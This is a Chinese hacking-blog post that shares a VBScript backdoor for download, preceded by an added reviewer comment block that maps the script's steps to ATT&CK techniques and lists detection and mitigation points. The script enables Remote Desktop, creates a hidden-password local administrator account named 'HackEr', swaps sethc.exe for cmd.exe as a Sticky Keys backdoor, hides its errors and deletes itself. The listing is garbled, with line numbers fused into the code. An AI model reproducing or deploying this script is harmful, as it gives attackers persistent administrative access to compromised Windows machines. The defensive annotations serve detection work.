作者:孤狐浪子 来源:红狼
' NOTE(review): This listing is extraction-damaged: the page's gutter line
' numbers are fused into the statements, many statements share one physical
' line, and path separators inside the string literals were lost. It is kept
' exactly as published and is not runnable as shown.
'
' What the visible statements do, in order:
'   1. Registry, through the WMI StdRegProv provider on the local machine
'      (strComputer = "."): creates keys under the Terminal Server control
'      key, sets fDenyTSConnections to 0 and writes PortNumber = 3389 under
'      two Terminal Server subkeys. This switches Remote Desktop on.
'   2. Local account, through the ADSI WinNT provider: creates a user and adds
'      it to the local Administrators group. Name and password come from the
'      first two script arguments; when none are given, the values hard-coded
'      in the Else branch are used.
'   3. Accessibility-binary replacement: a WScript.Shell Run call (window
'      style 0 = hidden, True = wait for completion) takes ownership of
'      sethc.exe with takeown, grants the current user full control with
'      cacls, and puts a copy of cmd.exe in its place.
'   4. Self-removal: deletes the script file named by WScript.ScriptName.
'   "On Error Resume Next" precedes each stage, so a failing step raises no
'   visible error and the remaining steps still run.
'
' Defender view. Each stage needs administrative rights already, so this is
' persistence after a compromise, not initial access. Related ATT&CK
' techniques: T1112 (Modify Registry), T1021.001 (Remote Desktop Protocol),
' T1136.001 (Create Account: Local Account), T1546.008 (Accessibility
' Features), T1070.004 (File Deletion).
' Detection points:
'   - a write to fDenyTSConnections or to an RDP PortNumber value made by a
'     script host or the WMI provider host (registry auditing, Sysmon event 13);
'   - Windows Security events 4720 (user account created) followed by 4732
'     (member added to a local group) for Administrators;
'   - process creation (event 4688, with command-line logging) where
'     wscript/cscript starts cmd.exe running takeown or cacls against a file
'     in system32;
'   - sethc.exe whose hash, signature or version information does not match
'     the shipped binary; compare against a known-good copy or run
'     "sfc /scannow".
' Mitigation: restrict who holds local administrator rights, require Network
' Level Authentication for RDP so the logon screen is not reachable before
' authentication, limit or log Windows Script Host use on servers, and alert
' on any change to the accessibility binaries.
' The literal account name and password in the Else branch are indicators of
' compromise: search local accounts for that name when responding.
1on error resume next2const HKEY_LOCAL_MACHINE = &H800000023strComputer = "."4Set StdOut = WScript.StdOut5Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\" &_6strComputer & "7ootdefault:StdRegProv")8strKeyPath = "SYSTEMCurrentControlSetControlTerminal Server"9oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath10strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWds11dpwdTds cp"12oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath13strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"14strKeyPath = "SYSTEMCurrentControlSetControlTerminal Server"15strValueName = "fDenyTSConnections"18 collapsed lines
16dwValue = 017oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue18strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWds19dpwdTds cp"20strValueName = "PortNumber"21dwValue = 338922oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue23strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"24strValueName = "PortNumber"25dwValue = 338926oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue27on error resume next28dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath29On Error Resume Next30Dim obj, success31Set obj = CreateObject("WScript.Shell")32success = obj.run("cmd /c takeown /f %SystemRoot%system32sethc.exe&echo y| cacls %SystemRoot%system32sethc.exe /G %USERNAME%:F© %SystemRoot%system32cmd.exe %SystemRoot%system32acmd.exe© %SystemRoot%system32sethc.exe %SystemRoot%system32asethc.exe&del %SystemRoot%system32sethc.exe&ren %SystemRoot%system32acmd.exe sethc.exe", 0, True)33CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
BY:孤狐浪子 QQ:393214425 BLOG
.blog.163.com附件下载地址: [开3389+非net创建管理用户+Shift后门+自删除脚本.rar](/blog/download.asp?id=52 “http://201314.free.fr/attachments/200801/%bf%aa3389_%b7%c7net%b4%b4%bd%a8%b9%dc%c0%ed%d3%c3%bb%a7_shift%ba%f3%c3%c5_%d7%d4%c9%be%b3%fd%bd%c5%b1%be.rar” (1 KB)